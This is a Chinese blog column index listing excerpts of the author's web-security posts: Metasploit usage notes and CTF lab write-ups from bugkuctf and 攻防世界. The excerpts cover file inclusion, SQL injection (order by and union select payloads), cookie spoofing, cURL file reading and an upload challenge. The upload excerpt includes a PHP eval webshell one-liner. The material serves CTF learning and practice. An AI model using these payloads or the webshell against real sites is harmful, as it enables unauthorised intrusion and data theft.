
网络安全web
舞动的獾
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
MSF使用记录
msf架构: Rex:调用的是操作系统中函数库,各种协议的沟通,协议的连接。是MSF依赖的基础。 MSF:core:最底层的库,MSF的核心库。 MSF:base: 由于核心库调用复杂凌乱,整理之后的结构为如下的几个模块,便于调用。 MSF:UI 用户界面。 启动: kali虚拟机下直接点击图标就可以使用 关于MSF数据库 msfdb msfdb init 初始化数据库 msfdb reinit 删除目前的的然后进行初化 msfdb delete 删除数据库,不在使用。 netstat -pa原创 2020-06-29 22:11:56 · 634 阅读 · 0 评论 -
flag在index里
flag在index里 题目要求: 文件包含 查看源代码,发现file=show.php,可能就是文件包含 并不知道大佬们如何得到源码的,我只是用他们的博客看看怎么做,关键就在于那个PHP过滤封装协议 由于是刚刚入门的小白,还不是很明白这种操作,继续研究了一下,官方文档链接如下 http://www.php.net/manual/zh/wrappers.php.php 这里摘抄一些跟本文有关的重...转载 2019-06-13 22:03:28 · 581 阅读 · 0 评论 -
bugkuctf 成绩单
bugkuctf成绩单 用hackbar插件的post对它进行测试,之前测试了出现人的成绩单,所以测试4,或者更高. id=1' order by 5# 没有回显,所以试试4 id=1' order by 4# 所以可以知道有四列 尝试联合查询 记得把前面的查询数据置空,写成id=0即可,显示正常,说明确确实实存在这四列数据 id=0' union select 1,2,3,4 # ...转载 2019-06-20 11:39:46 · 773 阅读 · 0 评论 -
bugkuctf 备份是个好习惯,秋名山老司机,速度要快
备份是个好习惯 通过地址发现有个备份,查看大佬的wp发现有。bak文件,加上之后,下载得到一份php.bak文件 include_once "flag.php"; ini_set("display_errors", 0); $str = strstr($_SERVER['REQUEST_URI'],'?'); $str = substr($str,1); $str = str_replace('...原创 2019-07-01 21:10:52 · 535 阅读 · 0 评论 -
攻防世界进阶upload
攻防世界进阶upload 注册登陆后,发现上传页面 试着上传一个文件3.php: 内容如下: <?php eval(@$_POST['a']); ?> 我们试着将它改个名字抓包,并且改为jpg,措辞测试发现只有jog能够传上去 虽然上传成功,但是并不能显示出文件名的位置,蚁剑连接失败 看到回显名称有uid号,无奈的丝毫没有头绪 只好看了大佬的博客,竟然是注入,文件名称注入 当...原创 2019-07-05 20:57:35 · 5435 阅读 · 5 评论 -
bugkuctf cookie欺骗
bugkuctf cookie 欺骗 打开页面后是一堆的乱码,我们可以从f12看到它的url包含了line=&filename=a2V5cy50eHQ= 在线解密base64,发现了文件名是keys.txt 我们可以试着改变文件名称将它的index.php给复现出来。 例如: 由于index.php的行数,我们可以用request库 的脚本将它还原出来,得到index.php的源码 ...原创 2019-07-11 16:49:08 · 823 阅读 · 0 评论 -
攻防世界 webj进阶
cat 攻防世界cat 原理: php cURL CURLOPT_SAFE_UPLOAD django DEBUG mode Django使用的是gbk编码,超过%F7的编码不在gbk中有意义 当 CURLOPT_SAFE_UPLOAD 为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读取文件。当且仅当文件中存在中文字符...原创 2019-08-01 11:34:17 · 1948 阅读 · 0 评论